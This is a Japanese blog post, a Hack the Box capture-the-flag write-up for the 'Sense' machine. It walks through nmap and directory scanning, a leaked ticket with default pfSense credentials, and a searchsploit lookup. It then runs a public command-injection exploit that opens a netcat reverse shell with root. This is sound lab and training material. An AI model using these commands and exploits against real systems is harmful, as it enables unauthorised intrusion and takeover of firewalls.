さんぽしの散歩記

【Hack the Box write-up】Sense

April 12, 2020

はじめに

筆者は Hack the Box 初心者です。 何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET

machine について

難易度は easy です。 スクリーンショット 2020-04-12 15.16.04.png

OSCPlike な machine だそうです https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html#vulnerable-machines

nmap

kali@kali:~$ nmap -sC -sV  10.10.10.60
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-12 00:34 EDT
Nmap scan report for 10.10.10.60
Host is up (0.22s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.22 seconds

443 ポートを見てみる

スクリーンショット 2020-04-12 15.18.00.png

こんな感じの login フォームが出てきます

dirbuster

(途中までですが)

スクリーンショット 2020-04-12 16.45.25.png system-users.txt って言う怪しいのが出てきました

system-users.txt を見る

####Support ticket###

Please create the following user

username: Rohit
password: company defaults

default の password は以下から pfsense だとわかります https://docs.netgate.com/pfsense/en/latest/usermanager/pfsense-default-username-and-password.html

login

login すると以下のようなページが出てきます スクリーンショット 2020-04-12 14.08.24.png

これで pfsense の version が 2.1.3-release だとわかります

searchsploit

kali@kali:~$ searchsploit pfsense
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                        |  Path
                                                                                                                                      | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
pfSense - 'interfaces.php?if' Cross-Site Scripting                                                                                    | exploits/hardware/remote/35071.txt
pfSense - 'pkg.php?xml' Cross-Site Scripting                                                                                          | exploits/hardware/remote/35069.txt
pfSense - 'pkg_edit.php?id' Cross-Site Scripting                                                                                      | exploits/hardware/remote/35068.txt
pfSense - 'status_graph.php?if' Cross-Site Scripting                                                                                  | exploits/hardware/remote/35070.txt
pfSense - (Authenticated) Group Member Remote Command Execution (Metasploit)                                                          | exploits/unix/remote/43193.rb
pfSense 2 Beta 4 - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities                                                          | exploits/php/remote/34985.txt
pfSense 2.0.1 - Cross-Site Scripting / Cross-Site Request Forgery / Remote Command Execution                                          | exploits/php/webapps/23901.txt
pfSense 2.1 build 20130911-1816 - Directory Traversal                                                                                 | exploits/php/webapps/31263.txt
pfSense 2.2 - Multiple Vulnerabilities                                                                                                | exploits/php/webapps/36506.txt
pfSense 2.2.5 - Directory Traversal                                                                                                   | exploits/php/webapps/39038.txt
pfSense 2.3.1_1 - Command Execution                                                                                                   | exploits/php/webapps/43128.txt
pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery                                                                     | exploits/php/webapps/41501.txt
pfSense 2.4.1 - Cross-Site Request Forgery Error Page Clickjacking (Metasploit)                                                       | exploits/php/remote/43341.rb
pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting                                                          | exploits/php/webapps/46538.txt
pfSense 2.4.4-p1 - Cross-Site Scripting                                                                                               | exploits/multiple/webapps/46316.txt
pfSense 2.4.4-p3 (ACME Package 0.59_14) - Persistent Cross-Site Scripting                                                             | exploits/php/webapps/46936.txt
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection                                                                        | exploits/php/webapps/43560.py
pfSense Community Edition 2.2.6 - Multiple Vulnerabilities                                                                            | exploits/php/webapps/39709.txt
pfSense Firewall 2.2.5 - Config File Cross-Site Request Forgery                                                                       | exploits/php/webapps/39306.html
pfSense Firewall 2.2.6 - Services Cross-Site Request Forgery                                                                          | exploits/php/webapps/39695.txt
pfSense UTM Platform 2.0.1 - Cross-Site Scripting                                                                                     | exploits/freebsd/webapps/24439.txt
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injectionを試してみます

exploit

$ python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.13 --lport 1212 --username rohit --password pfsense
kali@kali:~$ nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.60] 62626
sh: can't access tty; job control turned off
## whoami
root

一発で root まで取れてしまいました

終わりに

今回はかなり簡単な machine でした。 頑張って精進していきます

このエントリーをはてなブックマークに追加